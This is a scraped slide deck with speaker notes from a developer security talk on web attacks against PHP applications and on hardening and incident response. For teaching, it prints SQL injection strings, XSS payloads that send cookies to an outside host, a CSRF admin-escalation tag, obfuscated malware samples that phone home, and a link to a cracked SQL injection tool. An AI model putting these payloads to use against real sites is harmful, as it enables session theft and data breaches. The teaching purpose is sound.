gurumoop
 

My app is secure... I think

  • 1. Wim Godden Cu.be Solutions My app is secure... I think
  • 2. Who am I ? Wim Godden (@wimgtr)
  • 9. Belgium – the traffic
  • 10. Who am I ? Wim Godden (@wimgtr) Founder of Cu.be Solutions (http://cu.be) Open Source developer since 1997 Developer of PHPCompatibility, OpenX, ... Speaker at PHP and Open Source conferences
  • 11. Who are you ? Developers ? System engineers ? Network engineers ? Ever had a hack ? Through the code ? Through the server ?
  • 12. This talk Based on 2-day training Full stack → no Vagrant/VirtualBox required Lots of links at the end → slides on Joind.in Code samples in PHP → no worries, works the same in other languages
  • 13. My app is secure... I think Basic stuff = known... … or is it ? Code is not enough Code Webserver Database server Operating system Network
  • 14. Disclaimer Do not use these techniques to hack Use the knowledge to prevent others from hacking you
  • 15. Reasons for hackers to hack Steal and sell your data Use your infrastructure as a jumpstation to hack other servers Send out lots of spam Use your server in a botnet for DDOS attacks Bring down your systems …
  • 16. Part 1 : the most common attacks
  • 17. OWASP Open Web Application Security Project www.owasp.org Top 10
  • 18. SQL Injection (OWASP #1) Over 15 years Still #1 problem
  • 19. SQL Injection (OWASP #1) <? require("header.php"); $hostname="localhost"; $sqlusername="someuser"; $sqlpassword="somepass"; $dbName="somedb"; MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database."); @mysql_select_db("$dbName") or die("Unable to select database."); $fp=fopen("content/whatever.php","r"); while (!feof($fp)) $content.=fgets($fp,2); $res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']); for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++) { $lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n"; } $content=str_replace("<@textstring@>",$lst,$content); print $content; require("footer.php"); ?>
  • 20. SQL Injection (OWASP #1) Over 15 years Still #1 problem Easy to exploit Easy to automate (scan + exploit)
  • 21. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user where email='' OR '1'='1' E-mail :
  • 22. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user where '1'='1' E-mail :
  • 23. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user; E-mail :
  • 24. Hackers just want your data select * from user where email='' OR '1'='1' limit 2, 1; --'; select * from user where email='' OR '1'='1' limit 3, 1; --'; select * from user where email='' OR '1'='1' limit 4, 1; --'; ... ' OR '1'='1' limit 2, 1; –';E-mail :
  • 25. SQL Injection – much more... Much more than logging in as a user SQL injection possible → wide range of dangers
  • 26. Fixing SQL injection : attempt #1 Addslashes() ? $query = mysql_query('select * from user where id=' . addslashes($_GET['id'])); www.hack.me/id=5%20and%20sleep(10) select * from user where id=5 and sleep(10) What if we hit that code 100 times simultaneously ? MySQL max_connections reached → Server unavailable
  • 27. Fixing SQL injection : attempt #2 mysql_real_escape_string() mysqli_real_escape_string() pg_escape_string() ...
  • 28. Fixing SQL injection : use prepared statements $select = 'select * from user where email = :email'; $stmt = $db->prepare($select); $stmt->bindParam(':email', $_GET['email']); $stmt->execute(); $results = $stmt->fetchAll();
  • 29. ORM tools When using their query language → OK Beware : you can still execute raw SQL !
  • 30. Other injections LDAP injection Command injection (system, exec, ...) Eval (waaaaaaaaaah !) … User input → Your application → External system If you provide the data, it's your responsibility ! If you consume the data, it's your responsibility !
  • 33. Session fixation angel.cloud.com 1 Create evil PHP code 4 Session cookie on .cloud.com + redirect 2 3 devil.cloud.comdevil.cloud.com 5 Login6 Use evil session cookie <html> … <a href=”http://devil.cloud.com”>Verify your account</a> … </html>
  • 35. Ways to avoid session fixation/hijacking session.use_trans_sid = 0 session.use_only_cookies = true session.cookie_httponly = true Change session on login using session_regenerate_id(true) Do not share sessions between sites/subdomains Do not accept sessions not generated by your code Foreign session → remove the session cookie from the user Regenerate session regularly using session_regenerate_id(true) Use HTTPS session.cookie_secure = true All of the above help against session fixation AND session hijacking !
  • 36. XSS – Cross Site Scripting <?php addMessage($_GET['id'], $_GET['message']); echo 'Thank you for submitting your message : ' . $_GET['message']; URL : /submitMessage http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
  • 37. XSS – more advanced http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your- cookie.js"></script>
  • 38. XSS – Advanced, yet simple <img src=x onerror=this.src='http://someplace.io/post-the-cookie- here.php?c='+document.cookie> http://www.our-app.com/?id=5&message=Thanks %2C+we+will+be+in+touch+soon.%3Cimg+src%3Dx+onerror%3Dthis.src%3D %27http%3A%2F%2Fsomeplace.io%2Fpost-the-cookie-here.php%3Fc%3D %27%2Bdocument.cookie%3E%0D%0A
  • 39. XSS : Non-persisted vs persistent Previous examples were non-persistent : issue occurs once Post code to exploitable bulletin board → Persistent → Can infect every user → If you stored it without filtering, you're responsible for escaping on output !
  • 40. XSS : how to avoid Filter input, escape output <?php echo 'I just submitted this message : ' . htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
  • 41. CSRF : Cross Site Request Forgery www.our-app.com 1 Submit article for review 2 Retrieve articlefor review 3 Evil html or jsmakes call 4 Devil uses extra privileges Here's the article you were asking for. <img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
  • 42. CSRF : ways to avoid Escape the output (where did we hear that before ?) Add a field to forms with a random hash/token for verification upon submit Check the referer header → Easy to fake <form method="post" action="userSave.php"> <input name="id" type="hidden" value="5" /> <input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" /> rest of the form </form>
  • 43. General rules – input validation Assume all data you receive as input contains a hack attempt ! That includes data from trusted users → over 90% of hacks are done by employees/partners/... Filter on disallowed characters Check validity of Dates Email addresses URLs etc. Input validation is not browser-side code, it's server-side code (you can ofcourse use browser-side code to make it look good)
  • 44. General rules – validation or filtering ? Validation : Verify if the values fit a defined format Examples : expecting int, but received 7.8 → “error, 7.8 is not a valid integer” expecting international phone number, but received “+32 3 844 71 89” Filtering / sanitizing : Enforce the defined format by converting to it Examples : expecting int, but received 7.8 → 8 expecting int, but received 'one' → 0 expecting international phone number, but received “+32 3 844 71 89” → “+3238447189” Both have (dis)advantages
  • 45. General rules – escaping output Doing input validation → why do you need output escaping ? What if the data originates from a webservice an XML feed … Always escape output !
  • 46. Clickjacking Do you want to support our cause ? NoSure Do you want to delete all your Facebook friends ? Yes No FB button <style> iframe { /* iframe from facebook.com */ width:300px; height:100px; position:absolute; top:0; left:0; filter:alpha(opacity=0); opacity:0; } </style>
  • 47. Clickjacking - solutions Sending X-Frame-Options header : X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN Sending frame-ancestor directive : Content-Security-Policy: frame-ancestors 'none' Content-Security-Policy: frame-ancestors 'self' Content-Security-Policy: frame-ancestors example.com wikipedia.org Jump out of iframe (use Framekiller)
  • 48. Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php redirect to main
  • 49. Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php (doesn't check cookie !) redirect to main
  • 50. Bad authentication / authorization layer Only hiding URLs on view, not restricting on action /somewhere is visible on screen /somewhere/admin is not visible, but is accessible Allowing direct access to other user's data /user/profile/id/311 is the user's profile /user/profile/id/312 is also accessible and updateable Allowing direct access to file downloads with guessable urls /download/file/83291.pdf Creating cookies : loggedin=1 userid=312 admin=1
  • 51. Protecting your web stack Application language Webserver Database server Mail server Other servers Firewalls ...
  • 52. Protecting your web stack – Passwords Don't use MD5 or SHA1 → sha512, blowfish, … Set a good password policy Min 8 chars, min 1 number, min 1 uppercase char, … NO maximum length Try to avoid password hints → Email link is better for recovery Don't create your own password hashing algorithm ! Use password_hash() 5.5+ : built-in < 5.5 : ircmaxell/password-compat
  • 53. Protecting your web stack – Webserver Block direct access to upload directories
  • 54. Access to private files, uploads, ...
  • 55. Protecting your web stack – Webserver Block direct access to upload directories Allow only access to port 80 and 443 (!) Disable phpMyAdmin (VPN only if required) On Apache don't : AllowOverride All Options Indexes Block access to .svn and .git
  • 56. Protecting your web stack – Webserver
  • 57. Protecting your web stack – Database server No access from the web required Give it a private IP Other websites on network ? → send traffic over SSL
  • 58. Protecting your web stack Use public/private key pairs for SSH, not passwords Don't login as root → Use sudo for commands that really need it Allow SSH access only from VPN Running Memcached ? Gearman ? … ? → Block external access
  • 59. Protecting your web stack - firewalls Separate or on-server Default policy = deny all Don't forget IPv6 !!!
  • 60. First action of a hacker Make sure they don't lose the access they gained Create new user → easy to detect Install a custom backdoor → easy to detect with good IDS Install a backdoor based on installed software → Example : start SSHD with different config on different port (remember firewall ?) → Harder to detect → Kill it... what happens ? → Probably restarts via cronjob
  • 61. Using an Intrusion Detection System Host-based Intrusion Detection System (HIDS) OSSEC Samhain Network-based Intrusion Detection System (NIDS) Snort Sirucata
  • 62. One IDS distro to rule them all Security Onion Based on Ubuntu Contains all the IDS tools... ...and much more
  • 63. You've been hacked ! Now what ? (1/4) Take your application offline → Put up a maintenance page (on a different server) Take the server off the public Internet Change your SSH keys Make a full backup Check for cronjobs Check access/error/... logs (And give them to legal department) Were any commits made from the server ? → Your server shouldn't be able to !
  • 64. What a hack might look like eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0 xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW 5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW 9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
  • 65. What a hack might look like
  • 66. What a hack might look like $GLOBALS['_226432454_']=Array(); function _1618533527($i) { return '91.196.216.64'; } $ip=_1618533527(0); $GLOBALS['_1203443956_'] = Array('urlencode'); function _1847265367($i) { $a=Array('http://','/btt.php? ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER'); return $a[$i]; } $url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) . $_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)]; $GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents'); function _393632915($i) { return 'curl_version'; }
  • 67. You've been hacked ! Now what ? (2/4) Search system preg_replace base64_decode eval system exec passthru Search system and database script iframe
  • 68. You've been hacked ! Now what ? (3/4) Find out how the hack happened ;-) Write an apology to your customers Finally : Reinstall the OS (from scratch !) Update all packages to the latest version Don't reinstall code from backup ! Install source code from versioning system Restore DB from previous backup (use binary log file)
  • 69. Restoring your database to a specific point Turn on binary log Usually for master-slave replication Useful for fast recovery Make sure it can handle >24h of data Make a daily database backup Make a db dump to a file (mysqldump, …) Warning : locking danger → do this on the slave ! Backup the db dump file To recover : Restore the db dump file Replay binary log (mysqlbinlog …)
  • 70. You've been hacked ! Now what ? (4/4) Install IDS Get an external security audit on the code Get an external security audit on the system/network setup Change user passwords Relaunch Cross your fingers
  • 71. Takeaways Think like a hacker Can I steal data ? Can I DOS the site ? Which techniques could I use to do it ? Try it without looking at the code Try it while looking at the code Use SSL/HTTPS everywhere ! Block all traffic, then allow only what's needed Sanitize/filter your input Escape your output Use an IDS Never trust a hacked system
  • 74. The software discussed (and more) General resources OWASP : www.owasp.org SANS : http://www.sans.org/security-resources/ SecurityFocus : http://www.securityfocus.com/ CERT : http://cert.org/ SecTools : http://sectools.org/ SQL injection Havij (automated tool) – beware : might be infected !!!!!!!! https://thepirateboat.eu/torrent/8410326/Havij_v1.17ProCracked.7z Clickjacking demo : https://www.youtube.com/watch?v=3mk0RySeNsU Password use in PHP 5.5+ : password_hash function : http://php.net/password_hash < 5.5 : password_compat : https://github.com/ircmaxell/password_compat
  • 75. The software discussed (and more) SSL certificates RapidSSL FreeSSL : https://www.freessl.com/ Let's Encrypt (coming soon) : https://letsencrypt.org/ StartSSL : https://www.startssl.com Block access to .svn and .git : http://blogs.reliablepenguin.com/2014/06/26/block-access-git-svn-fol Webserver flood/scan detection Nginx : http://nginx.com/resources/admin-guide/restricting-access/ Multi-webserver : http://www.fail2ban.org Proxy-based : http://www.ecl-labs.org/2011/03/17/roboo-http-mitigator.html
  • 76. The software discussed (and more) Protecting your mail server SPF and DomainKeys : http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/ DNS Hijacking : http://www.gohacking.com/dns-hijacking/ Spoofing : http://www.windowsecurity.com/articles-tutorials/authentication_and_encryptio IPv6 – don't forget to firewall it the same way : https://www.sixxs.net/wiki/IPv6_Firewalling Automatic scanning tools : Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner Wapiti : http://wapiti.sourceforge.net/ Nexpose : http://www.rapid7.com/products/nexpose/
  • 77. The software discussed (and more) Slow HTTP DOS attacks : https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate IDS PHP PHPIDS : https://github.com/PHPIDS/PHPIDS Exposé : https://github.com/enygma/expose Host-based OSSEC : www.ossec.net Samhain : http://www.la-samhna.de/samhain/ AIDE : http://aide.sourceforge.net/ Network-based Snort : https://www.snort.org/ Sirucata : http://suricata-ids.org/ All in one : Security Onion : http://blog.securityonion.net/
  • 78. The software discussed (and more) Penetration testing live CD : Backtrack Linux : http://www.backtrack-linux.org/ Kali Linux : https://www.kali.org/
  • 79. In case you're interested Tutorial : 2,5h - 3h Training : 2 days 1,5 days of interactive training (partly slides, partly hands-on) Try out different security issues Experiment on local virtualboxes and physical machines we bring along 0,5 day of auditing Your code Your servers Your network As a global team effort or in smaller teams More details : https://cu.be/training
  • 80. Thanks ! Twitter @wimgtr Slides http://www.slideshare.net/wimg E-mail wim@cu.be

Editor's Notes

  • #13: This morning we&amp;apos;re going to talk about security. This tutorial is based on a 2day training that we offer. Training → exercises with Vagrant/Virtualbox Only 3h → too short to try everything → usually takes 30min before everyone&amp;apos;s ready We have a lot of ground to cover, because...
  • #14: Tutorial is titled... devs know basic security no-nos often unaware of less-common issues More importantly : creating secure app = more than creating secure code. Web app = chain of software and hardware Every part of chain = equally important. Neglecting single component → app and data at risk So next 3h → code and how to secure it Also security of web stack. Detect hack attempt, again both in code and stack Techniques to make it harder to go unnoticed
  • #15: Before we begin : Little disclaimer Looking at techniques hackers use Not promoting techniques Explaining to help you understand there&amp;apos;s lot more than meets the eye. Use knowledge to improve security, not exploit bad code
  • #19: …. That&amp;apos;s the reason to spend a little time explaining why there&amp;apos;s so much more to SQL injection than what most people think or talk about in talks
  • #20: …. That&amp;apos;s the reason to spend a little time explaining why there&amp;apos;s so much more to SQL injection than what most people think or talk about in talks
  • #21: …. That&amp;apos;s the reason to spend a little time explaining why there&amp;apos;s so much more to SQL injection than what most people think or talk about in talks
  • #25: As already mentioned : hackers want your data Easy way to retrieve it. Increment the limit start Retrieve each row of the table
  • #27: So how do we fix SQL injection ? Who has ever used addslashes to... ? How could you exploit this code ? No quotes ! We can&amp;apos;t retrieve data, but we can cause each query to sleep 10 sec. So addslashes is not a good solution
  • #28: The second option is the real_escape_string functions. Although they&amp;apos;re not bad → not really ideal anymore
  • #29: Best way : prepared statements They&amp;apos;re the most convenient and flexible way to protect against all the things we just saw.
  • #30: ORMs will help → they use prepared statements → You can still execute raw SQL → still vulnerable to SQL → be careful, even with ORM
  • #31: Plenty of other injections possible Rule is : don&amp;apos;t accept input from user and send it unfiltered to external system Let&amp;apos;s say SOAP webservice someone wrote years ago. Unfiltered data → SOAP → might have SQL injection issue. Not your problem ? SOAP developer gone, source code gone ? You consume service, you need to provide good data.
  • #33: Not as well know, but very dangerous and sneaky How it works... EXPLAIN SLIDE Ofcourse this implies passing session id in query string → Not recommended → Enable session.user_only_cookies
  • #34: Another common way Not passing session id on query string Works on limited sites Let&amp;apos;s say we can register subdomain and run PHP code EXPLAIN SLIDE
  • #36: Session fixation is serious problem Luckily few things that can be done All of tips also help in avoiding hijacking → when http traffic is intercepted → cookie gets stolen
  • #37: XSS problem is mostly poor output escaping This is most simple version. However, can get a lot worse.
  • #40: Non-persistent : targeted to one user at a time Persistent : can infect every usre
  • #43: There&amp;apos;s a few